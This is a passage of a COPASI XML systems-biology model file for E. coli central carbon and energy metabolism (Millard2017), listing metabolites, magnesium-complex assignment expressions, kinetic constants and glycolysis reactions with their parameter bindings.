<rdf:Description>
<dcterms:W3CDTF>2013-10-01T10:37:13Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_47" name="talC3" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_47">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T10:37:13Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_48" name="tkt" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_48">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T10:37:48Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_49" name="tktC2" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_49">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T10:37:48Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_50" name="ADP" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_50">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:47:02Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_51" name="AMP" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_51">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:47:05Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_52" name="ATP" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_52">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:47:08Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_53" name="CAMP" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_53">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:47:11Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_54" name="COA" simulationType="fixed" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_54">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T14:35:06Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_55" name="HCO3" simulationType="fixed" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_55">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:47:23Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_56" name="P" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_56">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:45:13Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_57" name="MG" simulationType="fixed" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_57">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T23:50:03Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_58" name="MgADP" simulationType="assignment" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_58">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T00:28:29Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[MG],Reference=Concentration>*<CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[ADP],Reference=Concentration>/(<CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Values[KdADPMg],Reference=Value>+<CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[MG],Reference=Concentration>)
</Expression>
</Metabolite>
<Metabolite key="Metabolite_59" name="MgATP" simulationType="assignment" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_59">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2015-01-23T11:39:48Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[MG],Reference=Concentration>*<CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[ATP],Reference=Concentration>/(<CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Values[KdATPMg],Reference=Value>+<CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[MG],Reference=Concentration>)
</Expression>
</Metabolite>
<Metabolite key="Metabolite_60" name="MgFDP" simulationType="assignment" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_60">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T00:28:01Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[MG],Reference=Concentration>*<CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[FDP],Reference=Concentration>/(<CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Values[KdFDPMg],Reference=Value>+<CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[MG],Reference=Concentration>)
</Expression>
</Metabolite>
<Metabolite key="Metabolite_61" name="ASP" simulationType="fixed" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_61">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-14T12:17:44Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_62" name="CYS" simulationType="fixed" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_62">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-16T14:03:20Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_63" name="MN" simulationType="fixed" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_63">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-27T11:44:38Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_64" name="Hin" simulationType="fixed" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_64">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-15T10:15:49Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_65" name="H2O" simulationType="fixed" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_65">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-15T10:15:34Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_66" name="O2" simulationType="fixed" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_66">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-15T10:59:46Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_67" name="FAD" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_67">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-15T15:23:15Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_68" name="FADH2" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_68">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-15T15:23:13Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_69" name="ACE" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_69">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-14T12:22:26Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_70" name="GLCx" simulationType="reactions" compartment="Compartment_1" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_70">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T23:49:09Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_71" name="Px" simulationType="fixed" compartment="Compartment_1" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_71">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-24T10:32:17Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_72" name="ACEx" simulationType="reactions" compartment="Compartment_1" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_72">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2015-01-03T00:04:02Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_73" name="Hout" simulationType="reactions" compartment="Compartment_2" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_73">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-15T10:15:59Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_74" name="GLCp" simulationType="reactions" compartment="Compartment_2" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_74">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-23T16:11:40Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_75" name="Pp" simulationType="reactions" compartment="Compartment_2" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_75">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-31T12:41:29Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_76" name="ACEp" simulationType="reactions" compartment="Compartment_2" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_76">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2015-01-03T00:12:13Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
</ListOfMetabolites>
<ListOfModelValues>
<ModelValue key="ModelValue_0" name="FEED" simulationType="fixed" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_0">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T10:22:21Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_1" name="KdADPMg" simulationType="fixed" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_1">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T19:54:50Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_2" name="KdATPMg" simulationType="fixed" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_2">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-20T18:47:20Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_3" name="KdFDPMg" simulationType="fixed" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_3">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-20T18:47:20Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_4" name="KmICIT_ACN" simulationType="fixed" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_4">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-13T02:18:45Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_5" name="KmCIT_ACN" simulationType="fixed" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_5">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-13T02:18:59Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_6" name="KmACO_ACN" simulationType="fixed" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_6">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-13T02:19:05Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_7" name="KeqNDH" simulationType="fixed" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_7">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-25T10:29:33Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
</ListOfModelValues>
<ListOfReactions>
<Reaction key="Reaction_0" name="PGI" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_0">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T23:08:22Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_11" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_8" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_5001" name="k1" value="0.1"/>
<Constant key="Parameter_5000" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_5001"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_11"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_5000"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_8"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_1" name="PFK" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_1">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-07T10:52:04Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_52" stoichiometry="1"/>
<Substrate metabolite="Metabolite_8" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_50" stoichiometry="1"/>
<Product metabolite="Metabolite_9" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4999" name="k1" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4999"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_52"/>
<SourceParameter reference="Metabolite_8"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_2" name="FBA" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_2">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-07T10:49:12Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_9" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_6" stoichiometry="1"/>
<Product metabolite="Metabolite_12" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4998" name="k1" value="0.1"/>
<Constant key="Parameter_4997" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4998"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_9"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4997"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_6"/>
<SourceParameter reference="Metabolite_12"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_3" name="TPI" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_3">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-07T10:49:41Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_6" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_12" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4996" name="k1" value="0.1"/>
<Constant key="Parameter_4995" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4996"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_6"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4995"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_12"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_4" name="GDH" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_4">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T17:03:28Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_12" stoichiometry="1"/>
<Substrate metabolite="Metabolite_18" stoichiometry="1"/>
<Substrate metabolite="Metabolite_56" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_4" stoichiometry="1"/>
<Product metabolite="Metabolite_19" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4994" name="k1" value="0.1"/>
<Constant key="Parameter_4993" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4994"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
